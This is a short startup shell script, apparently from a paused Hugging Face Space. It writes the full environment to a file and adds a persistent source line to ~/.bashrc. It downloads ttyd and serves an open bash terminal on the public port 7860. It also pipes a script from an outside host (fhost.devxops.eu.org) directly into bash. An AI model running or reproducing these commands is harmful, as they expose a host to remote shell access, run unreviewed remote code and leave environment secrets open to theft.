Spaces:
Paused
Paused
set +e | |
echo $WORKROOT > ~/tt.txt | |
env > ~/env.txt | |
echo "source ${WORKROOT}/build/script/env.sh" >> ~/.bashrc && source ~/.bashrc | |
bash ${WORKROOT}/build/script/ext_run.sh | |
#bash ${WORKROOT}/build/script/ext_debug.sh | |
# ======== | |
curl -L -o ttyd https://github.com/tsl0922/ttyd/releases/download/1.6.1/ttyd_linux.x86_64 && chmod a+x ttyd | |
./ttyd -p 7860 bash & | |
# debug | |
curl https://fhost.devxops.eu.org/devops/cicd/inits-v3/script/debug.sh | bash -s -- 335 || true | |
# -- |